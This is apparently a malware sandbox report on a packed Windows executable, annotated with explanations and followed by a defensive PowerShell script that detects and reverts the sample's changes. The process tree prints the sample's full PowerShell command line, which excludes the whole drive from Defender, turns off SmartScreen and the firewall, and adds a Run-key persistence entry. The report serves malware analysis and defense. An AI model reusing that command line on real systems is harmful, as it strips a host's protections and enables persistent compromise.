Analysis
- max time kernel: 154s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 15-02-2022 13:36
Static task: static1
Behavioral task: behavioral1
- Sample: 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
- Resource: win10v2004-en-20220112
The signatures, process tree and memory dumps below are from behavioral2, the Windows 10 run (the dump names carry the behavioral2/ prefix); the Windows 7 run is not shown on this page.
General
- Target: 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe
- Size: 3.4MB
- MD5: 240dc3df45fd2233148581beb6cdb4b1
- SHA1: 6a565becd793e09d7a69ff2a116f821ddc2d79b1
- SHA256: 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a
- SHA512: 0ff80f8192e3bda22f303b78eef624cd2b48fe0bc611c7acdfa48f4cd06b7bc1fcaa60710e8dcae6ccccd35bc0be3ac3e38d12c6e8e8e2d184b412d9a4e9bc52
Malware Config
Signatures
-
Modifies security service (2 TTPs, 1 IoC)
Processes:
- powershell.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"
Start = 4 is SERVICE_DISABLED, so the Windows Defender Firewall service (mpssvc) will not start at the next boot; the default is 2 (Automatic). The change is written straight to the registry because the service control manager does not let administrators change the startup type of mpssvc.
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
Processes:
- WerFault.exe (PID 2052) created a process with parent PID 984 (4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe)
This is the Windows Error Reporting instance that handled the sample's crash (see "Program crash" below), not behaviour of the sample itself.
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
-
Downloads MZ/PE file
-
Executes dropped EXE (3 IoCs)
Processes:
- UpSys.exe, PID 3168
- UpSys.exe, PID 1636
- UpSys.exe, PID 1092
-
Modifies Windows Firewall (1 TTP)
-
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes:
- 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe: Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation
YARA rule match: themida (2 IoCs)
Processes:
- behavioral2/memory/984-131-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp: rule themida
- behavioral2/memory/984-132-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp: rule themida
Both dumps are the 9.4MB image region of the sample (PID 984) listed under the memory dumps below, so the packer/protector signature applies to the main executable rather than to a dropped file.
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
- powershell.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"
Checks whether UAC is enabled
Processes:
- 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
No host or URL is recorded for this signature on this page; the Network section below is empty.
-
Drops file in System32 directory (1 IoC)
Processes:
- powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
ModuleAnalysisCache is PowerShell's own module cache, not a payload. The interesting part is the location: C:\Windows\system32\config\systemprofile is the profile directory of the LocalSystem account, so the powershell.exe that wrote it (PID 3132, the child of UpSys.exe in the process tree) was running as SYSTEM.
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Processes:
- 4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe, PID 984
ThreadHideFromDebugger stops debug events for the calling thread from reaching an attached debugger; together with the BIOS and ACPI checks above it is part of the sample's anti-analysis layer.
Drops file in Windows directory (3 IoCs)
Processes:
- svchost.exe: File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat
- TiWorker.exe: File opened for modification C:\Windows\Logs\CBS\CBS.log
- TiWorker.exe: File opened for modification C:\Windows\WinSxS\pending.xml
These are Delivery Optimization and Windows servicing (CBS) writes by Windows components running in the sandbox, not activity of the sample.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox flags this as likely ransomware behaviour, but it is also common in installers and anti-VM checks; no process or IoC is attributed to the signature on this page.
-
Program crash (1 IoC)
Processes:
- WerFault.exe (PID 2196), target PID 984 (4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe)
Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- MusNotifyIcon.exe: Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- MusNotifyIcon.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
-
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
- WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Both signatures are triggered only by Windows components (WerFault.exe gathers CPU and BIOS details for the crash report, MusNotifyIcon.exe is the update notification tray process). The sample's own hardware fingerprinting is the SystemBiosVersion/VideoBiosVersion query recorded under "Checks BIOS information in registry".
Modifies data under HKEY_USERS (64 IoCs)
Processes:
- powershell.exe, Key created under \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\: CA\CRLs, CA\CTLs, Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs, Root\Certificates, Root\CRLs, SmartCardRoot, trust, trust\Certificates, trust\CRLs, TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs
- powershell.exe, Key created under \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\: CA\Certificates, CA\CRLs, CA\CTLs, Disallowed, Disallowed\Certificates, Disallowed\CTLs, trust, trust\Certificates, trust\CRLs, trust\CTLs, TrustedPeople, TrustedPeople\Certificates, TrustedPeople\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- UpSys.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- UpSys.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- UpSys.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- svchost.exe, under \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization: Key created DeliveryOptimization; Key created Usage; Set value (int) Config\DODownloadMode = "1"; Set value (int) Config\DownloadMode_BackCompat = "1"; Set value (int) Config\KVFileExpirationTime = "132895822296636113"; Set value (str) Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"; Set value (int) Usage\DownloadMonthlyGroupBytes = "0"; Usage\UploadRatePct = "100"; Usage\BkDownloadRatePct = "45"; Usage\GroupConnectionCount = "0"; Usage\UploadCount = "0"; Usage\SwarmCount = "1"; Usage\MemoryUsageKB = "4096"; Set value (str) Usage\CPUpct = "1.111109"; Usage\DownloadMonthlyRateFrCnt = "0"; Usage\LinkLocalConnectionCount = "0"; Usage\NormalDownloadCount = "0"; Usage\DownloadMonthlyRateBkBps = "0"; Usage\DownloadMonthlyRateBkCnt = "0"; Usage\DownloadMonthlyCdnBytes = "0"; Usage\MonthlyUploadRestriction = "0"; Usage\DownloadMonthlyLinkLocalBytes = "0"; Usage\UplinkUsageBps = "0"; Usage\UploadMonthlyInternetBytes = "0"; Usage\DownloadMonthlyRateFrBps = "0"; Usage\MonthID = "2"; Usage\NormalDownloadPendingCount = "0"; Usage\PriorityDownloadCount = "0"; Usage\DownloadMonthlyInternetBytes = "0"
The svchost.exe Delivery Optimization writes (S-1-5-20 is NetworkService) are background Windows activity. The powershell.exe certificate-store key creation is the routine initialisation the crypto API performs the first time it runs under a profile. What matters is the hive: processes running as LocalSystem see HKU\.DEFAULT as their HKEY_CURRENT_USER, so the .DEFAULT writes by powershell.exe and UpSys.exe confirm that the dropped launcher and its PowerShell child ran as SYSTEM. The UpSys.exe ZoneMap changes (AutoDetect=0, ProxyBypass=1, IntranetName=1) are the only entries in this list made by the dropped binary.
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
- powershell.exe, PID 2372 (2 entries)
- WerFault.exe, PID 2196 (2 entries)
- UpSys.exe, PID 3168 (4 entries)
- UpSys.exe, PID 1636 (4 entries)
- powershell.exe, PID 3132 (2 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
- powershell.exe, PID 2372: SeDebugPrivilege, SeBackupPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
- UpSys.exe, PID 3168: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0 (as reported)
- UpSys.exe, PID 1636: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- powershell.exe, PID 3132: SeDebugPrivilege
- TiWorker.exe, PID 2372: SeSecurityPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, then the triple SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege repeated for the remainder of the 64-entry list
SeAssignPrimaryTokenPrivilege together with SeIncreaseQuotaPrivilege is exactly the pair CreateProcessAsUser requires, consistent with UpSys.exe starting its child under a different (SYSTEM) token. PID 2372 is listed for both powershell.exe and TiWorker.exe; the PID was evidently reused after powershell.exe exited, and the TiWorker.exe entries are ordinary servicing-stack privilege use.
Suspicious use of WriteProcessMemory (10 IoCs)
Processes (each pair is reported twice):
- PID 984 (4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe) wrote to memory of PID 2372 (powershell.exe)
- PID 2052 (WerFault.exe) wrote to memory of PID 984 (4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe)
- PID 2372 (powershell.exe) wrote to memory of PID 3168 (UpSys.exe)
- PID 2372 (powershell.exe) wrote to memory of PID 2072 (netsh.exe)
- PID 1092 (UpSys.exe) wrote to memory of PID 3132 (powershell.exe)
Every pair is a parent writing into a process it has just created (the same parent/child pairs as the process tree), which the sandbox reports for ordinary process creation; nothing here indicates injection into an unrelated process.
Processes
-
1. C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe (PID 984)
   "C:\Users\Admin\AppData\Local\Temp\4c8e8d525ca06a318c7845c658b9d8fd417f2b7b4c386659ac295a0b07125c7a.exe"
   - Checks BIOS information in registry
   - Checks computer location settings
   - Checks whether UAC is enabled
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2372, child of 1)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      - Modifies security service
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\ProgramData\UpSys.exe (PID 3168, child of 2)
         "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         4. C:\ProgramData\UpSys.exe (PID 1636, child of 3)
            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            5. C:\ProgramData\UpSys.exe (PID 1092, child of 4)
               "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
               - Executes dropped EXE
               - Modifies data under HKEY_USERS
               - Suspicious use of WriteProcessMemory
               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3132, child of 5)
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
      3. C:\Windows\system32\netsh.exe (PID 2072, child of 2)
         "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
   2. C:\Windows\system32\WerFault.exe (PID 2196, child of 1)
      C:\Windows\system32\WerFault.exe -u -p 984 -s 2088
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
1. C:\Windows\system32\MusNotifyIcon.exe
   %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
   - Checks processor information in registry
1. C:\Windows\system32\WerFault.exe (PID 2052)
   C:\Windows\system32\WerFault.exe -pss -s 448 -p 984 -ip 984
   - Suspicious use of NtCreateProcessExOtherParentProcess
   - Suspicious use of WriteProcessMemory
1. C:\Windows\System32\svchost.exe
   C:\Windows\System32\svchost.exe -k NetworkService -p
   - Drops file in Windows directory
   - Modifies data under HKEY_USERS
1. C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe (PID 2372)
   C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
   - Drops file in Windows directory
   - Suspicious use of AdjustPrivilegeToken

Notes on the powershell.exe command line (PID 2372):
- Everything after powershell.exe is a single argument list. PowerShell evaluates each $( ) subexpression before it starts UpSys.exe, so the Defender exclusion, the two registry edits, the netsh call, the ACL copy and the creation of C:\ProgramData\check.txt all execute inside PID 2372, and only their output is handed to UpSys.exe as extra arguments. The signatures agree: the mpssvc and Run-key writes are attributed to powershell.exe, and netsh.exe is its child.
- $HKLM is never assigned, so –Path $HKLM\SOFTWARE\... expands to \SOFTWARE\..., a path relative to the root of the current drive. The preceding cd HKLM:\ is what makes those paths land under HKEY_LOCAL_MACHINE.
- Effects, in order: Add-MpPreference -ExclusionPath C:\ excludes the entire system drive from Defender scanning; EnableSmartScreen = 0 under the policy key turns SmartScreen off; mpssvc Start = 4 disables the firewall service at the next boot, and netsh advfirewall set allprofiles state off turns every firewall profile off immediately; the ACL of C:\ProgramData\Microsoft\Windows\SystemData (SYSTEM-only by default) is copied onto C:\ProgramData\MicrosoftNetwork, which restricts access to the persistence directory; the Run value WinNet starts C:\ProgramData\MicrosoftNetwork\System.exe at logon; check.txt is a marker file. Only the mpssvc and Run-key writes appear in the signature list; the report does not record whether the exclusion, the SmartScreen policy or the ACL copy succeeded, or whether System.exe was ever written.
- UpSys.exe is started three times with /SW:0 powershell.exe (the third time with an additional /TI/), and the last instance (PID 1092) spawns powershell.exe (PID 3132) under the SYSTEM profile. The meaning of the /SW:0 and /TI/ switches is not established by the report; /SW:0 is consistent with a ShowWindow value of 0 (SW_HIDE).
- The sample (PID 984) crashed; WerFault.exe PID 2196 produced the report and WerFault.exe PID 2052 is the helper started for the same crash with PID 984 as its nominal parent, which is what the NtCreateProcessExOtherParentProcess signature records.
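The following host-audit script is an added example and is not part of the sandbox report or of the sample: it checks a Windows host for each change the powershell.exe payload above makes and can revert them. The indicator paths, registry values and the UpSys.exe SHA256 are taken from this report; the function and variable names (Get-RegValue, Get-SampleIndicators, Undo-SampleChanges), the ACL comparison by SDDL string and the choice to revert mpssvc through the registry are this example's own. It assumes an elevated Windows PowerShell 5.1 or later session with the Defender and NetSecurity modules available.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the sandbox report or the sample. Audits a host for the changes the
# payload makes (Defender exclusion, SmartScreen policy, mpssvc Start=4, firewall off, Run key,
# dropped files, persistence-directory ACL) and optionally reverts them. Indicator values come
# from the report; every function and variable name here is this example's own.

$UpSysSha256 = '5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2'  # C:\ProgramData\UpSys.exe (report)
$RunTarget   = 'C:\ProgramData\MicrosoftNetwork\System.exe'                          # Run\WinNet value (report)
$RunKey      = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$MpssvcKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\mpssvc'
$SmartScreen = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System'

function Get-RegValue([string]$Path, [string]$Name) {
    # Returns $null rather than throwing when the key or value is absent.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-SampleIndicators {
    $findings = New-Object System.Collections.Generic.List[object]
    $note = {
        param($Check, $Hit, $Detail)
        $findings.Add([pscustomobject]@{ Check = $Check; Hit = [bool]$Hit; Detail = "$Detail" })
    }

    # Persistence: Run\WinNet -> C:\ProgramData\MicrosoftNetwork\System.exe
    $run = Get-RegValue $RunKey 'WinNet'
    & $note 'Run\WinNet points at dropped System.exe' ($run -eq $RunTarget) $run

    # Firewall service disabled at boot: Start=4 (SERVICE_DISABLED; default is 2, Automatic)
    $start = Get-RegValue $MpssvcKey 'Start'
    & $note 'mpssvc Start=4 (disabled)' ($start -eq 4) $start

    # SmartScreen forced off by policy
    $ss = Get-RegValue $SmartScreen 'EnableSmartScreen'
    & $note 'EnableSmartScreen=0 policy' ($ss -eq 0) $ss

    # Whole system drive excluded from Defender scanning (Add-MpPreference -ExclusionPath C:\)
    $excl = try { @((Get-MpPreference -ErrorAction Stop).ExclusionPath) } catch { @() }
    & $note 'Defender ExclusionPath contains C:\' ($excl -contains 'C:\') ($excl -join ';')

    # Any firewall profile switched off (netsh advfirewall set allprofiles state off)
    $off = @(Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' })
    & $note 'Firewall profile(s) disabled' ($off.Count -gt 0) (($off | ForEach-Object Name) -join ',')

    # Dropped files; UpSys.exe is compared with the SHA256 recorded in the report
    $upsys = 'C:\ProgramData\UpSys.exe'
    $hash  = if (Test-Path -LiteralPath $upsys) { (Get-FileHash -LiteralPath $upsys -Algorithm SHA256).Hash } else { $null }
    & $note 'UpSys.exe present with reported SHA256' ($hash -eq $UpSysSha256) $hash
    foreach ($p in 'C:\ProgramData\check.txt', $RunTarget) {
        & $note "File present: $p" (Test-Path -LiteralPath $p) ''
    }

    # Persistence directory given the ACL of SystemData (Get-Acl ... | Set-Acl ...). The reference
    # folder is SYSTEM-only, so reading its ACL can fail even when elevated; report that honestly.
    $dir = 'C:\ProgramData\MicrosoftNetwork'
    if (Test-Path -LiteralPath $dir) {
        $ref = try { (Get-Acl -LiteralPath 'C:\ProgramData\Microsoft\Windows\SystemData').Sddl } catch { $null }
        $cur = (Get-Acl -LiteralPath $dir).Sddl
        & $note 'MicrosoftNetwork ACL copied from SystemData' ($ref -and $cur -eq $ref) $(if ($ref) { $cur } else { 'reference ACL unreadable' })
    }
    return $findings
}

function Undo-SampleChanges {
    # Reverts only what the payload changed. The service control manager does not let
    # administrators change the startup type of mpssvc (the payload went through the registry
    # for the same reason), so Start is rewritten in the registry and takes effect at next boot.
    Remove-ItemProperty -Path $RunKey -Name 'WinNet' -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path $SmartScreen -Name 'EnableSmartScreen' -ErrorAction SilentlyContinue
    Set-ItemProperty -Path $MpssvcKey -Name 'Start' -Value 2 -Type DWord
    Set-NetFirewallProfile -All -Enabled True
    try { Remove-MpPreference -ExclusionPath 'C:\' -ErrorAction Stop } catch { Write-Warning "Defender exclusion not removed: $_" }
    Write-Warning 'Quarantine C:\ProgramData\UpSys.exe and C:\ProgramData\MicrosoftNetwork\ before rebooting.'
}

$report = Get-SampleIndicators
$report | Format-Table -AutoSize
if ($report | Where-Object Hit) { Write-Warning 'Indicators found; review them, then call Undo-SampleChanges.' }
```

Get-SampleIndicators returns objects rather than text so the result can be exported (Export-Csv, ConvertTo-Json) or pushed to a SIEM from a fleet-wide run; remediation is a separate function so nothing is changed unattended. A Hit on the Run value, the mpssvc Start value or the hash match is specific to this sample, whereas a disabled firewall profile or a Defender exclusion on its own may have a legitimate local explanation and should be read together with the other rows.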
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\UpSys.exe
- MD5: efe5769e37ba37cf4607cb9918639932
- SHA1: f24ca204af2237a714e8b41d54043da7bbe5393b
- SHA256: 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
- SHA512: 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
(the report lists this file four times with identical hashes)
-
Memory dumps
- memory/984-130-0x00007FFB26450000-0x00007FFB26452000-memory.dmp: 8KB
- memory/984-131-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp: 9.4MB (themida YARA match)
- memory/984-132-0x00007FF708DE0000-0x00007FF70973B000-memory.dmp: 9.4MB (themida YARA match)
- memory/2372-137-0x00007FFB05963000-0x00007FFB05965000-memory.dmp: 8KB
- memory/2372-138-0x000001AF5FB00000-0x000001AF5FB02000-memory.dmp: 8KB
- memory/2372-139-0x000001AF5FCC0000-0x000001AF5FCE2000-memory.dmp: 136KB
- memory/2372-142-0x000001AF5FB03000-0x000001AF5FB05000-memory.dmp: 8KB
- memory/2372-143-0x000001AF5FB06000-0x000001AF5FB08000-memory.dmp: 8KB
- memory/2372-146-0x000001AF5FB08000-0x000001AF5FB09000-memory.dmp: 4KB
- memory/3132-154-0x00007FFB05F33000-0x00007FFB05F35000-memory.dmp: 8KB
- memory/3132-155-0x0000017B71000000-0x0000017B71002000-memory.dmp: 8KB
- memory/3132-156-0x0000017B71003000-0x0000017B71005000-memory.dmp: 8KB
- memory/3132-159-0x0000017B71006000-0x0000017B71008000-memory.dmp: 8KB
- memory/3132-160-0x0000017B712A0000-0x0000017B712E4000-memory.dmp: 272KB
- memory/3132-161-0x0000017B71590000-0x0000017B71606000-memory.dmp: 472KB
The two 9.4MB dumps of PID 984 cover the same address range and are the sample's main image (the 3.4MB file expands to 9.4MB in memory, as expected for a protected executable); the PID 2372 and 3132 dumps are small heap regions of the two powershell.exe instances.